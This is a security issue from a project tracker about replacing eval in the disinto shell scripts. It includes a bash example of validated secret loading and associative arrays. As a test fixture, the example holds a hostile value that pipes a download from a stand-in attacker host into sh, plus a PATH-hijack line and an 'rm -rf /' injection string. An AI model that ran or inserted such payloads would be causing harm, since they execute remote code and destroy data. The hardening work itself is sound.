SECURITY: Replace eval usage with safer alternatives #59

Closed
opened 2026-03-31 18:06:48 +00:00 by dev-bot · 0 comments

Summary

The codebase uses eval in multiple places which can lead to code injection vulnerabilities, especially when combined with unvalidated environment variables or API responses.

Locations

  1. lib/env.sh:32 — SOPS decryption output parsed with eval
  2. lib/issue-lifecycle.sh:57 — Dynamic variable name expansion
  3. lib/issue-lifecycle.sh:74 — Dynamic variable assignment with eval
  4. lib/mirrors.sh:16 — eval with echo for variable expansion

Risk

  • If environment variables contain malicious content, it could be executed
  • Combined with unquoted curl URLs, could lead to command injection
  • SOPS decryption output is not verified before eval

Recommended Fix

  1. Replace eval "$(sops -d ...)" with a write-validate-source pattern: sops -d file > tmp && validate tmp && source tmp — note that source <(sops -d ...) is equally unsafe since the decrypted output is still unsanitised
  2. Use associative arrays or jq for structured data access instead of dynamic variable names
  3. Validate all input before any shell evaluation
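The write-validate-source pattern and the associative-array replacement from the list above, worked through as an added bash example; this is not code from the disinto project. It does not call sops: decrypt() is a stand-in that returns constructed plaintext, EXPECTED_VARS, the fixture contents and the issue-state helpers are assumed for the example, and the validator admits only single-quoted literals or bare tokens for known variable names so that a `$(...)`, an appended command, or a PATH override in the decrypted output is rejected before anything is sourced.

```bash
#!/usr/bin/env bash
# Added example, not code from the disinto project: a write-validate-source
# replacement for `eval "$(sops -d ...)"` plus an associative array in place
# of eval-built dynamic variable names. sops is not invoked; decrypt() below
# is a stand-in returning constructed plaintext so this runs offline.
set -euo pipefail

# Names the secrets file may assign (assumed for this example). A well-formed
# line assigning anything else (PATH, IFS, LD_PRELOAD, BASH_ENV, ...) is
# rejected: sourcing it would alter everything that runs afterwards.
EXPECTED_VARS=(API_TOKEN MIRROR_URL)

is_expected_var() {
  local v
  for v in "${EXPECTED_VARS[@]}"; do
    [ "$v" = "$1" ] && return 0
  done
  return 1
}

# validate_env_file FILE
# Accept blank lines, comments, and NAME=VALUE lines whose VALUE is a
# single-quoted literal (nothing expands inside single quotes) or a bare token
# from a conservative character set. `$`, backtick, `;`, `|`, `&`, `(` or text
# after the closing quote fails both patterns, so $(...) and appended commands
# never reach `source`. Only the line number is logged: the line may hold a
# real secret.
validate_env_file() {
  local file=$1 line= name= n=0
  local quoted="^[A-Za-z_][A-Za-z0-9_]*='[^']*'\$"
  local bare='^[A-Za-z_][A-Za-z0-9_]*=[A-Za-z0-9_./:@%+-]*$'
  while IFS= read -r line || [ -n "$line" ]; do
    n=$((n + 1))
    case $line in '' | '#'*) continue ;; esac
    if ! [[ $line =~ $quoted ]] && ! [[ $line =~ $bare ]]; then
      printf 'rejected %s:%d: malformed assignment\n' "$file" "$n" >&2
      return 1
    fi
    name=${line%%=*}
    if ! is_expected_var "$name"; then
      printf 'rejected %s:%d: unexpected variable %s\n' "$file" "$n" "$name" >&2
      return 1
    fi
  done < "$file"
}

# Stand-in for `sops -d "$1"`; swap in the real call in production.
decrypt() { cat "$1"; }

# load_secrets ENCRYPTED_FILE
# Decrypt into a private temp file (mktemp creates it 0600), validate, and only
# then source. `source <(sops -d ...)` leaves no place for the validation step.
load_secrets() {
  local tmp rc=0
  tmp=$(mktemp) || return 1
  if decrypt "$1" > "$tmp" && validate_env_file "$tmp"; then
    # shellcheck disable=SC1090
    . "$tmp" || rc=$?
  else
    rc=1
  fi
  rm -f "$tmp"
  return "$rc"
}

# Constructed plaintexts standing in for decrypted secrets files.
GOOD_SECRETS="API_TOKEN='tok_example_123'
MIRROR_URL=https://codeberg.org/johba/disinto.git"
INJECTED_SECRETS="API_TOKEN='tok_example_123'
MIRROR_URL=\$(curl -s https://attacker.invalid/x | sh)"
PATH_OVERRIDE="PATH='/tmp/evil:/usr/bin'"

# try_load PLAINTEXT: feed it through load_secrets as the "encrypted" input.
# Returns 0 if it was accepted and sourced, 1 if it was rejected.
try_load() {
  local f rc=0
  f=$(mktemp)
  printf '%s\n' "$1" > "$f"
  load_secrets "$f" || rc=$?
  rm -f "$f"
  return "$rc"
}

# Replacement for eval-built dynamic names such as eval "issue_${id}_state=\$state".
# In an associative array the key is data; under eval the same string is code,
# so an id like '42; rm -rf /' is stored rather than executed.
declare -A ISSUE_STATE

set_issue_state() {  # set_issue_state ID STATE
  ISSUE_STATE[$1]=$2
}

get_issue_state() {  # get_issue_state ID: prints the state, returns 1 if unknown
  [ -n "${ISSUE_STATE[$1]+set}" ] || return 1
  printf '%s\n' "${ISSUE_STATE[$1]}"
}
```

The allowlist of variable names is the part most often left out: a decrypted file that only ever contains `NAME='value'` lines is still dangerous to source if one of those names is PATH, IFS or BASH_ENV, so checking the name is as important as checking the value. The error output deliberately omits the offending line, since a malformed secrets file may still contain a real secret.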

References

  • ShellCheck warnings for eval usage
  • OWASP Command Injection prevention guide

Upstream: codeberg johba/disinto#818

dev-bot added the backlog label 2026-03-31 18:06:48 +00:00
dev-qwen self-assigned this 2026-03-31 18:08:24 +00:00
dev-qwen added in-progress and removed backlog labels 2026-03-31 18:08:24 +00:00
dev-qwen removed their assignment 2026-03-31 18:28:26 +00:00
dev-qwen removed the in-progress label 2026-03-31 18:28:27 +00:00
Reference: johba/disinto#59